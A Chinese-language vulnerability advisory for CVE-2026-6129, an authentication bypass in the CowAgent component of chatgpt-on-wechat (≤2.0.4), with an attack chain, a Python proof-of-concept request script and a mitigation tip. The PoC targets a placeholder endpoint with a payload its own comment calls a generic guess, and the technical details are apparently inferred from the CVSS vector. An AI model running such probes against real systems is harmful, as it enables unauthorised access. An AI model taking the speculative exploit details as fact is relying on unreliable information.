IPBUF安全漏洞报告
English
CVE-2026-6129 CVSS 7.3 高危

CVE-2026-6129 chatgpt-on-wechat身份验证缺失漏洞

披露日期: 2026-04-12

漏洞信息

漏洞编号
CVE-2026-6129
漏洞类型
权限绕过
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
zhayujie/chatgpt-on-wechat (CowAgent)

相关标签

权限绕过身份验证缺失chatgpt-on-wechatCowAgent

漏洞概述

zhayujie/chatgpt-on-wechat项目的CowAgent组件在2.0.4及之前版本中存在严重漏洞。该漏洞源于Agent Mode Service组件的未知功能中缺少身份验证机制。攻击者可无需用户交互,通过网络远程发起攻击,导致系统面临机密性泄露、完整性破坏及可用性降低的风险。目前漏洞利用代码已公开,官方尚未响应。

技术细节

该漏洞的核心在于zhayujie/chatgpt-on-wechat项目中CowAgent组件的Agent Mode Service未能正确实施访问控制。在受影响版本(<=2.0.4)中,特定的API端点或功能接口未对请求进行必要的身份验证检查。由于CVSS向量显示PR:N(无需权限)和UI:N(无需交互),攻击者可以直接向目标服务端口发送特制的数据包或HTTP请求。通过操纵未公开的函数参数,攻击者能够绕过正常的登录流程,直接调用敏感功能。这可能导致未授权访问聊天记录、操控Agent行为或执行某些管理操作。由于S:U(范围未改变),攻击被限制在当前组件或服务上下文中,但仍能造成显著的C、I、A影响。

攻击链分析

STEP 1
侦察阶段
攻击者扫描网络,识别出运行zhayujie/chatgpt-on-wechat且开启CowAgent组件的目标系统。
STEP 2
漏洞探测
攻击者向Agent Mode Service的相关接口发送请求,检测是否返回了需要认证的错误信息,或者直接响应了请求。
STEP 3
漏洞利用
由于存在身份验证缺失,攻击者构造特定的数据包直接调用受影响的功能,无需提供凭证。
STEP 4
达成目标
成功获取系统敏感信息或执行未授权操作,造成机密性、完整性或可用性影响。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: CVE-2026-6129 - Auth Bypass in CowAgent # Description: This script attempts to access the Agent Mode Service without authentication. target_url = "http://target-ip:port/agent/endpoint" # Replace with actual target headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json" } # Example payload to trigger the vulnerable function payload = { "command": "status_check", # Generic command based on description "param": "manipulation" } try: # Send request without authentication token response = requests.post(target_url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed! Authentication bypassed.") print("[+] Response:", response.text) else: print("[-] Target may not be vulnerable or endpoint has changed.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[!] Error: {e}")

影响范围

zhayujie chatgpt-on-wechat CowAgent <= 2.0.4

防御指南

临时缓解措施
建议立即检查系统配置,若非业务必须,请暂时关闭CowAgent组件或Agent Mode Service。同时,通过网络ACL(访问控制列表)限制仅本地或受信任的内网IP访问相关服务端口,降低被远程攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表